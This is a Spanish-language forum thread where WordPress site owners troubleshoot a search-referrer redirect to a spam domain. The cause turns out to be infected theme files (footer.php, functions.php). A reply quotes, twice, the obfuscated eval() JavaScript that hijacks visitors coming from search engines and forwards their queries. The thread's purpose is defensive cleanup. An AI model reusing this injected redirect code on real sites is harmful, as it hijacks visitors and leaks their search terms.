Redirección extraña en mi sitio web

• Autor Autor thelarios
  • Fecha de inicio Fecha de inicio
thelarios

thelarios

Dseda
Redactor
Verificación en dos pasos activada
Hola amigos tengo un problema con mi web, lo que pasa es que hace tiempo cambie mi web de blogger a Wordpress, hoy buscando mi web por google me encontré que mi web redirecciona a una pagina muy extrañana googosearch.biz/search.php?ty=1&terms=canciones%20romanticas, esto pasa si se busca desde google, pero no si se introduce la url directamente en el navegador, es la primera vez que me pasa algo así.

Web : Enlace eliminado

Revisa tu .htaccess ahí debe estar el problema

Insertar CODE, HTML o PHP:
<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>

puede que sea ese codigo bien feo xD ni idea para que sera 😱

Revisa tu .htaccess ahí debe estar el problema

Disculpa mi ignorancia, pero donde encuentro ese archivo

Insertar CODE, HTML o PHP:
<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>

puede que sea ese codigo bien feo xD ni idea para que sera 😱

Disculpa mi ignorancia, pero donde encuentro ese archivo :encouragement:

Disculpa mi ignorancia, pero donde encuentro ese archivo

Disculpa mi ignorancia, pero donde encuentro ese archivo :encouragement:

el primero es un archivo en la raiz de tu dominio se llama .htaccess
y el otro es un codigo que esta en el footer de tu theme creo que en el footer.php de la carpeta de tu theme
me cambio el nombre a q ese es el problema 😛7: es lo malo de bajar esas plantillas "gratis "

Entonces solo puedo cambiar el theme y se soluciona el problema, por que ese codigo no se encuentra en el Footer.php 😕

entonces esta en el index.php
lo cierto es que esta en tu theme, puedes cambiar de theme o depurar la plantilla, pero si no sabes mucho de php te van a doler las pelotas asi que mejor una plantilla mas cool por que esa esta fea :fatigue:

entonces esta en el index.php
lo cierto es que esta en tu theme, puedes cambiar de theme o depurar la plantilla, pero si no sabes mucho de php te van a doler las pelotas asi que mejor una plantilla mas cool por que esa esta fea :fatigue:

Jajaja, pues eso hice y parece que funciona, gracias por toda la ayuda :encouragement:

Hola amigos tengo un problema con mi web, lo que pasa es que hace tiempo cambie mi web de blogger a Wordpress, hoy buscando mi web por google me encontré que mi web redirecciona a una pagina muy extrañana googosearch.biz/search.php?ty=1&terms=canciones%20romanticas, esto pasa si se busca desde google, pero no si se introduce la url directamente en el navegador, es la primera vez que me pasa algo así.

Perdón por revivir el tema, pero entrando desde google españa buscando unos términos detecte que con una key me pasa lo mismo pero no sucede lo mismo entrando por ejemplo desde google argentina o google de mexico con la misma key, la cuestión es que yo siempre tuve el blog en wp.

thelarios tu pudiste resolver tu problema cuando ingresabas desde google?

Perdón por revivir el tema, pero entrando desde google españa buscando unos términos detecte que con una key me pasa lo mismo pero no sucede lo mismo entrando por ejemplo desde google argentina o google de mexico con la misma key, la cuestión es que yo siempre tuve el blog en wp.

Revisa el functions.php.

Gracias Carlos, recién estaba buscando en google y entre al foro del mismo en ingles y vi que podía estar ahí la infección y correctamente la misma esta en el functions.php y eso que no uso themes "pirateados".

Era el theme que era gratis, solo lo cambie pero efectivamente esta en el archivo fuctions.php

Para los que no saben fíjense que pueden estar infectado por mas que sea un tema único que no se pueda descargar de internet.

Aclaración, no se que pasa pero recién entre a mirar de nuevo porque tuve un descenso importante en las visitas online y tenia nuevamente el archivo infectado.

Voy a ver si es por la utilización de algún plugin o algo. 😡

Atrás